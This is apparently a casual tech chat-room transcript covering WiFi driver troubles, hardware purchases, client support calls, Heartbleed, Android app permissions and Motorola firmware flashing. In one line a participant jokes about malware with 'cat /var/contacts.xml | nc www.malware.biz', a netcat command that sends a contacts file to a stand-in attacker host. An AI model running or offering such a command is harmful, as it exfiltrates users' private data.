@ThatBrazilianGuy What else would I be? ;p

Bob
12:33 AM
Oh yea.
@OliverSalzburg How much did that mac sell for?

aww shit. Over 500 articles in my rss feeds after yesterday's internetlessness

@JourneymanGeek it's all old news. Mark all as read and move on. ;D

@MichaelFrank: That would horrify my minor OCD streak ;p
I'll just sniff through them, and probably skip most of em

Most of the emails I get I just click on and say "Ugh! Why you say 1 new email!"

I think i need to set my e-mail to "invitation only" put a bouncer at the door.

12:49 AM
especially if you're building a cluster. Though, I'd be curious how you'd interconnect them, this dosen't have the USB ethernet chip, so you might have a bit more freedom on how you do it

1:05 AM
woo website is down for maintenance
If you're talking about the pluggable modules I saw those yesterdday

Yeah, using ddr2 type sockets

site's back!
I still think those things are amazing

I think they are

Did you watch the video?

Not yet

1:30 AM
Right, preparing for a wipe

I've gotten too damned sick of that goddamned qvo bullshit that someone accidentally got into my PC. Damned thing won't die.
So... backing up the system to minimise potential whining, nuking and rebuilding

so, brough DDR2 Non-ECC unbuffered for my desktop and it's not working :(

Q: admin users not working on Samba 3

Canadian LukeI am setting up a new Samba3 domain on Debian Wheezy. I installed the packages, and tweaked the smb.conf file to my liking. I cannot access the shares though, except those I'm supposed to based on my own group membership. This may seem normal, but I am also listed as the admin users in the [globa...

Anyone have any good DOS/CMD/batch references? I have to write a batch file D:
I had this one awesome site, but I forgot to bookmark it.

@jour qvo?

some stupid browser hijack
keeps coming back

Hmmm. Marginally related, is there a way to prevent Firefox add-ons from being inside on Linux?

Bob
3:00 AM
@Seth I'm a decent reference if you want to ask a specific question :P

installed?

@Bob I'll keep that in mind :P
atm, I don't remember any of it :(

@jour yeah

Bob
O.O
@allquixotic There's a portable 4 TB HD in local shops...
$400
That's portable, not external.
Wow.

What's the difference?

3:02 AM
flash based vs. a real disk
(usually)

Bob
@ThatBrazilianGuy Portable doesn't require an external power supply. And they're usually smaller.
@Seth Uh, nope.

Oh? Misunderstood?
I mean sure, they have 2.5 inch portable drives but I always thought portable meant, you know, portable.

I think its 2 2.5 inch drives
so its a bit fat. Might do raid.

hm, looked it up. The main difference is the power source.. Bad misconception on my part :(

Q: What are the benefits of "fuzzy logic" in a rice cooker?

mattshepherdI'm considering making the giant leap to a serious rice cooker -- after research, it seems like the Zojirushi is the way to go, even over the venerated Tiger -- but I'm trying to parse out the dozens of models and various benefits. It seems like the difference in price between a 5.5-cup model t...

Who told these people it ever was completly "secure" ? And how many times was it revealed that it was not?

Every major SE computer related site now has this question... Probably soon it will be asked even on cooking.stackexchange.com :D — Nikolay 10 hours ago

1 hour later…
6:45 AM
Okay, so I've got a strange problem I'm just going to leave here:
My laptop (Asus EeePc 1005HA) will after being connected perfectly fine to a WiFi network shut off the network adapter
By that I mean no longer show any networks
Though sometimes if I go to look at the Network Adapters thing in the Network and Sharing Centre, the entire adapter disappears (and from HW manager)
Restarting is the only 'fix' that works for me
Restarting once from having no network adapter gives me back my WiFi adapter but doesn't show any networks
Restarting again from that will take me back to stage one
It can stay connected for anywhere between 5 minutes and 5 hours (maybe more/less IDK)

"I know I'm not supposed to post a longass irrelevant comment as a post, I've read the guideline telling me not to do it, buuuuuut..."
"fuck it, who cares, I have a empty textbox anyway, so here goes.."

Back to what I was dumping: Yes I have the latest adapter drivers
and nothing else really.

changed the drivers off late?
installed any programs with work with the drives?

nope, this problem started happening
well, probably not but nothing I think I did that should cause it
wow, new record, drops all networks in under 3 minutes from boot
Okay so now I know it's not the work network I was connecting to, it happens at home aswell
Actually
at this point I may as well post this as a question
Do you think it is too localised?

@njallam: not really. I do seem to think we're a bit iffy on troubleshooting. From my experience I'd also do a bit of a site survey to make sure you're not getting kicked off by interference, and what's your wifi card?

7:00 AM
@JourneymanGeek Atheros AR9285
And my manufacturer (for the laptop) no longer supports it

A quick google search suggests it might be a shitty card
and that looks fairly common

I could believe that

MIGHT be driver issues. You could chance it with Atheros' drivers rather than the OEM ones maybe

I've tried both
same problem
unless I'm not installing the Atheros ones properly
Right click INF, Click Install?
Oh
I just checked the driver website for Atheros, turns out I've been installing 7's drivers, naturally Windows 8 drivers are just a scroll wheel away
That could have something to do with this
Correct Drivers installed - 5 minutes from boot - still have connectivity
Well
I feel like an idiot

7:26 AM
On the contrary, you tried all the logical steps and missed one. I'd wait a little longer just to be sure though
Beats me, I use ralink (for external) or intel almost entirely ;p

If you don't see me posting a wall of text here next week, you can assume it's fixed

Thanks for making me recheck the driver website
bye

quack ;p

If you don't see me posting a wall of text here next week, you can assume it's fixed
Well that didn't take long
Problem is still happening
Nope, now it's worse
Restarting alternates between No WiFi Adapter -> WiFi Adapter but no networks -> No WiFi Adapter
Have now restarted 5 times, pattern still present
Re-reinstalling the adapter drivers brings me back to the original problem
Now No WiFi Adapter -> No WiFi Adapter

10:07 AM
@JourneymanGeek When buying a new SSD, which brand is the one to buy?
Others are welcome to answer that as well :P

Just went into msconfig and chose Diagnostic Startup
One can hope this can solve it
Now I'm back to the original problem
Anyone want to swap laptops?

10:32 AM
@OliverSalzburg: I've got a samsung (though get a 840 pro or evo if you can, not the plain vanilla ones). Otherwise, get an intel.
@njallam: or swap the wifi card ;p

@JourneymanGeek I was looking at an MZ-7TE250KW

@OliverSalzburg: Thats the upgraded version of mine

Then it'll be fine. Including the Desktop Kit, it costs as much as an Intel

Looks good to me
desktop kit?
so bracket, USB/Sata adaptor?

@JourneymanGeek Right. I mostly care about the drive bay conversion thing
And it has a SATA cable and all the screws

10:35 AM
@OliverSalzburg: meh, those are cheap, and quote often you don't have to give a shit
of course, my PC has bays that accept both sort of drives

This is for a client's desktop. So I thought I'd just get the whole package. Less hassle
His HDD died today and now we'll set him up with one of our old Esprimos

Yeah
Then its fine. Might even be slightly overkill
remember to use a 6gbps port

Will do!
I'm also buying some ancient RAM for one of our servers :P Komputerbay 16GB (8X2GB) DDR2 PC2-5300F 667MHz CL5 ECC Fully Buffered 2Rx4 FB-DIMM
Oh baby!

It's a HP ProLiant DL380 G5
Currently running with 2 GB!

10:46 AM
That might make a big difference
or non at all XD

I honestly think the machine is fine. It has a single 4-core Xeon CPU and some ancient 72 GB and 120 GB HDDs
I just installed a domain controller on it
Runs a lot faster than our 3 year old Fujitsu crapload that is powering our SBS

SCSI?
With those sizes they may not be that old

All msconfig has done is screw up Avast

I think it's SAS, yeah
I just shut it down, otherwise I'd check
Humm spending company money on other people hardware. Kinda satisfying

@OliverSalzburg Mind buying me a new laptop while you're at it? :P

11:06 AM
@OliverSalzburg Hey... Nothing wrong with Fujitsu! >:(

@njallam No freebies!
@MichaelFrank It might just be the horrible SBS

@OliverSalzburg Hows about 1 over 5 year old netbook for it?
With dodgy WiFi

@OliverSalzburg I work for Fujitsu. I'm a little biased. :V

@njallam No trades either! :D

I have $5 in my drawer

11:09 AM
@MichaelFrank Well, I guess it actually is the software that's killing the machine. But I have to simply power off the machine several times per week because it's unresponsive. I just hate it :P
Which is why we're now upgrading the old server to set up a new system and migrate stuff around

@OliverSalzburg oh ew...

Well, I honestly have no clue what to do now
Okay
So I just ran Network Diagnostics
Suggestion "Turn on wireless capability"
With an "Apply this fix" button
WHAT?
Why would that be off!?

Oh, that happens a lot randomly
;p

I am so confused

Even on my thinkpad, just not that often
Gremlins ;p

11:16 AM
That option was not there last time I ran that wizard
New in 8.1 Update?
Do you know what the Apply This Fix button actually did?
In detail more than "Turned on wireless capability"

Thats very likely exactly what it did ;p

Where has that option been for the past 4 months?

I remember using it on XP, and definately on 7

Now to fix Avast
(I broke it somehow with msconfig)

(of course, I tend to use ethernet where possible, powerline networking where ethernet won't reach, and wifi only when I absolutely must)

11:21 AM
How can one download Avast without CNET?

Cheers
I hate CNET

Which reminds me
I need to swap out the AV on my dad's XP box
No idea what to use yet

Why not Avast?

It talks?

11:28 AM
I think that can be turned off in settings

Honestly I haven't put much thought into it. I also need to do a pair of full system rebuilds

Yup Settings -> Appearance -> Sounds

I've gotten too used to MSSE honestly ;p

and I'm down to one XP box

11:30 AM
More on the laptop story, it seems I've now managed to pick up half the street's WiFi networks

lol
That might be part of your problem
wifi in my neighbourhood sucks cause there's too many damned APs

I was really disappointed yesterday because the only feature I was really looking forward to was running Modern apps in desktop view
turns out that's coming in update 2
anyway, I should actually do some work now
bye again

12:03 PM
@njallam *yawn* been done for 2 years.
basically Stardock ModernMix + Start8 is (for all intents and purposes) Windows 8.1 Update 2
(and then some)

@allquixotic Best apps ever

12:19 PM
Humm. I'm unpacking an Office ISO right now and all the file names are upper case
I feel like it's screaming at me!
INSTALL ME.NOW

@OliverSalzburg HOW_AR~1.YOU

Ugh
It's the wrong ISO. I unpacked Exchange Server :P

@OliverSalzburg that makes sense -- all emails are sent in all caps anyway

after years of conditioning from its users, Exchange has accepted the inevitable

12:30 PM
So I'm working on this "support ticket" right now. A client has an Excel sheet with relative links to documents in it. Somehow the client managed to save the document and have all links converted to absolute paths, breaking the whole document... which is shared with everyone in the whole company
So I restore a version from last month from backup where the links are still relative and send it to the client. Client tells me the file is still broken
So now I'm sitting here, installing Office in a VM in their network to try and replicate the issue
I haven't worked on anything I wanted to get done to
And I know that the file is fine. The client probably just opened it from a temporary location and the relative paths just didn't work at that location O___o

@OliverSalzburg -_-

le derp.

And this whole day already started with two support calls while I was still in bed!

@OliverSalzburg I didn't realize you did tech support

@allquixotic but Stardock
Not a fan of them

12:36 PM
@allquixotic Yeah, neither did I!

@njallam er....? "not a fan of them"? they've been predicting Microsoft's next step with Windows 8 since before it was released and you're "not a fan of them"? what did they do to piss you off? write the Gamers' Bill of Rights? refuse to ever use DRM? sell all their products at reasonable prices? how dare they!!!
I mean shit, if you're not a fan of Stardock, you must absolutely abhor Microsoft, right? I can't imagine you run Windows at all, right? Microsoft is a MUCH more evil company than Stardock!

I just associate them with bloatware

First call was about one of our FairManager instances, second call was from a business partner whose HDD died and this thing right now is because we have a service contract with the company which apparently covers Excel problems...

Or am I confusing them with another similarly named company?

@njallam do you have Java installed? How about Flash? How about Adobe Acrobat? any one of those programs has much more bloat to it than anything Stardock's ever made

12:38 PM
You probably associate them with the kind of people who installed WindowBlinds on their desktop because it "looks cooler"

the only program Stardock's ever written that has had any sort of "bloat" is WindowBlinds, and that program is specifically designed to produce "eye candy" on the desktop at the cost of performance (and people who buy it are aware of and accept that fact)
I run Start8 and ModernMix on a Pentium N3520; look it up, the benchmarks on that CPU are pathetic -- and I notice exactly zero slowdown on the system due to it
if there were any bloat to it at all, I'd feel it in the loading times for stuff on that system
that system is just downright slow
(and was that way out of the box before I even touched it)

Okay.

You should try defragmenting your registry to speed it up

@OliverSalzburg ....hahahahaha
you have a good sense of humor :D

12:42 PM
I wonder if installing Windows XP would make it faster
I mean, aside from the fact that the touchscreen wouldn't work
...or probably half the other hardware in it

I was just asked for an "Office 7" disc
What is it with today?

12:58 PM
@OliverSalzburg 2013 = 14, 2010 = 12, 2007 = 11, 2003 = 10, XP = 9, 2000 = 8, 97 = 7.... wow, that's ancient
they want an Office 97 disk?

I dunno what they want
This is a WhatsApp conversation

they probably have some file that's in compatibility mode and they're like "OMG! I NEED THE ANCIENT VERSION!"

I asked back "Office or Windows" assuming they mean Windows 7
Reply was "Office"
So it's definitely Office 7

Office internal version number 7 is Office '97
ask if that's what they mean, and if so, tell them they don't need that and to go away
if they mean office two-thousand-and- 7, that's more reasonable

I generally tend to ask more questions until they give up
Because it really doesn't matter which Office it is. The whole question was "Do you still have that Office 7 disc?" And, yes, of course I have it. I have discs for all versions of Office

1:03 PM
o_O
for all versions?
even Office 1.0?

@allquixotic I could probably produce one

OK, phew... finally got my server and all the VMs protected against heartbleed

Did you also revoke all your keys for everything?

1:22 PM
@OliverSalzburg nah, but I... I mean, I'll be getting to that when I can pay StartSSL the revocation fee >_<
wow, /. crowd is very traditionalist: slashdot.org/pollBooth.pl
65% of the people spend $0-$10 per year on mobile apps
I've spent more than that just on JuiceSSH and some other apps in the past 6 months

@JourneymanGeek sup woof-woof?

I've been meaning to buy some apps but no credit/debit card :/

my cat kept declaring herself as important this morning - I was downstairs getting laundry and she was rubbing her head against the banister and saying "me! me! me!"

@allquixotic: Most of the apps worth buying are games anyway ;p

1:35 PM
every time I asked her "you?" she'd say "me!"

Cats are wierd creatures ;p

Bob
@allquixotic Except you'd want to chuck it out a window the first time you tried hitting the win key and then searching.
@allquixotic Just how useful would revoking it be?
@allquixotic Eh, I only started spending more this year :P

@JourneymanGeek quite to the contrary, I spend very precious little on games. most of what I spend on is premium "useful" software

Bob
Titanium Backup was one of them.

JuiceSSH, (yes I admit) McAfee Premium (hey! it's Intel now!! and John McAfee is happy to be done with it! screw him btw)
also Neutron Player

Bob
1:37 PM
@allquixotic ...McAfee. Seriously?

@Bob hey! McAfee's Android app is quite good

Bob
Why on earth would you want an antivirus prog on your phone, anyway?

and it's Intel Security now anyway

@allquixotic: I think the one bit of software I absolutely need to buy is linkbubble

@Bob to go "dude, this shit is malware" in case I impulse install something that wants permission to cat /var/contacts.xml | nc www.malware.biz

1:38 PM
(and bleh, at some point I'll probably pick up a prepaid debit card for shit like that)

Bob
@allquixotic That implies you install a lot of random apps.

@Bob I really don't, but once in a while I hear of a "neat" app
I generally read the permissions and imagine if there's a world of possibility where it could need that perm, and if not, I seriously reconsider installing it

lol
I do!

but I sometimes install it anyway if I really want it

But I tend to install them to my old phone

Bob
1:39 PM
@allquixotic Really, Android needs some way of saying "no, you can't have that permission".
Rather than accepting/rejecting all of them.

@Bob even iOS has that feature, doesn't it?

Bob
@allquixotic Why are you asking me about what iOS has? :P

IIRC, there is some program or firmware or something that lets you reject individual permissions on rooted phones, but obviously it can cause programs to crash if they get a null pointer back or something

@allquixotic I haven't seen it yet

Bob
@allquixotic Bad decision from the beginning.
If they designed the OS properly from the ground up, they could've trained app developers to handle partial permissions just fine.

1:41 PM
You're probably thinking of Cyanogenmod

let's see... apps.. on my homescreen i have: gmail, AOSP text messaging, google play music, spotify, audioguru, audible, google authenticator, battle.net mobile authenticator, mcafee security, data toggle widget, chrome, firefox, hipchat, stackexchange, google drive, mighty grocery, wegmans app, youtube, elemental kingdoms, smart light, AOSP settings, google calendar, Hi-Q MP3 recorder, calculator, MLB At Bat, LastPass, Google Navigator, and Google Play Store

@allquixotic GAuthenticator -> FreeOTP

@OliverSalzburg why? Google's already got me by the {inappropriate bodily reference}; if they're an evil actor, I've been owned since I picked up this phone at the Verizon store
at this point, unfortunately I have to assume, for better or worse, that Google is "safe"
if it turns out they're not, I would have to completely redesign my mobile life. new hardware, new OS, new search engine, new email system, etc

@allquixotic FreeOTP also supports custom token validity durations. And it's just better!

@OliverSalzburg and I need custom token validity durations for what reason exactly? the default one seems fine to me

1:44 PM
google navigator?

Bob

faster would be hard to authenticate in that short time, and slower would be too insecure

There's also [xprivacy](http://repo.xposed.info/module/biz.bokhorst.xprivacy) for rooted phones.
> XPrivacy can prevent applications from leaking privacy sensitive data. XPrivacy can restrict the categories of data an application can access. This is done by feeding an application with no or fake data. There are several data categories which can be restricted, for example contacts or location. For example, if you restrict access to contacts for an application, this will result in sending an empty contact list to the application. Similarly, restricting an application's access to your location

@allquixotic Well, you don't decide the duration

@ThatBrazilianGuy my phone is stock and non-rooted now... and I kinda like it that way; there are no known root exploits on my firmware that have been published, which is actually a good thing for security

1:45 PM
And the lack of support in GAuthenticator prevents more widespread use of the feature :P

@allquixotic: I thought google navigator got rolled into maps?

@JourneymanGeek yeah, the blue arrow icon ;p the GPS turn by turn navigation component of maps
@JourneymanGeek it's still a separate icon on my system. but I'm running KitKat 4.4

So am I.

the separate icon could be a Moto customization on the Droid Maxx, or even a Verizon customization

Bob
@allquixotic Most root exploits rely on recovery/download/debugging mode - not a security hole, really.

1:47 PM
@Bob if the firmware can be in any way exploited to gain root, it's a security hole... the ones I've seen on Motorola recently (including a prior release of firmware for this phone) involved just running a native binary, basically... a black box that exploits while the phone is running
nothing to do with recovery or USB debugging; in fact, USB debugging is quite useless for rooting in my experience
in theory you could install an app that has a native component that roots you and then uses its rooted privs to do bad things

Bob
@allquixotic That's an entirely different method of rooting, and that one is a security issue :P
The rooting methods that have to run outside the OS aren't a problem.

having a ROM with no known root exploits, at least none that are public information, is a good thing -- that means anyone who's going to exploit you will have to find it on their own, instead of just being a script kiddie and using someone else's exploit. and it's a lot harder to find one on your own and then not publish it
it's a lot worse if your ROM has an exploit that basically consists of "run this binary and you will have a # prompt" -- which all Moto firmwares up until 4.4 have had

Bob
o.O

because apps can run binaries

Bob
Also, I should probably install the 4.4 update sometime.
But I really cant be bothered.
And there's the typical reports of it breaking things.

1:49 PM
when I updated to 4.4, I didn't take ANY risks
I backed up (very carefully) all my data and app state, and then did an FXZ to 4.4
complete system wipe
FXZ wipes all partitions -- user, cache, data, system, etc -- and flashes a new radio, new system partition, new bootloader, so basically every writable/user-programmable portion of the device gets "clean" code -- and the firmware has to be signed or a locked bootloader won't take it
I got the FXZ from Motorola themselves anyway so I'm not worried about the firmware being backdoored

Bob
> what scares me about 3d printers is that every 2d printer I've owned has been unexplainably horrible to use. Its like they've not mastered the dimensions before moving ahead.
hehe
@allquixotic FXZ?

@Bob don't know what it stands for, but it's basically an image file that consists of a baseband firmware, plus a partition image of every partition that comprises the Android system, incl. bootloader
you use RSD Lite or fastboot to flash it and you lose absolutely everything, but it's the safest way to upgrade
the only thing I think it doesn't flash is the SIM card
I had a lightly modified and rooted 4.2.2 firmware before, so I figured anything short of a complete FXZ without preserving data would likely break things badly
a few weeks ago I spent the better part of my evening re-configuring everything after I FXZ'ed
had a couple progs backed up to the cloud, fortunately

Bob
@allquixotic Eh. Samsung would be Odin.

the biggest annoyance is using the on-screen keyboard to type in all my various passwords to reauthenticate all the apps after they've been reinstalled

@allquixotic: I tend to find that annoying
thoughhhhh

1:56 PM
also had to stop Google Play from automatically attempting to install a bunch of apps I had installed previously which I didn't want to be reinstalled (de-bloating as part of the FXZ)

I could always plug in a regular keyboard
@allquixotic: I thought moto was pretty good with not bloating shit up

@JourneymanGeek de-bloating apps which I myself had previously chosen to install

Google Play was like "surely you want the same apps installed now that you've FXZ'ed as you had previously, right? right?"
me: !!no, stop that!

Wait, you can do that?

1:57 PM
FXZ ?

@Bob hmm... I guess the usefulness would depend on whether I suspect anyone has stolen my private key yet
@JourneymanGeek when I went through the initial phone setup, Google asked me if I wanted to back up all my apps to the cloud
me: "sure!"

since I have unlimited data and all that

It didn't do that when I installed pomega on the HTC

7 mins ago, by allquixotic
@Bob don't know what it stands for, but it's basically an image file that consists of a baseband firmware, plus a partition image of every partition that comprises the Android system, incl. bootloader

1:59 PM
AKA Stock Flash File ? :P
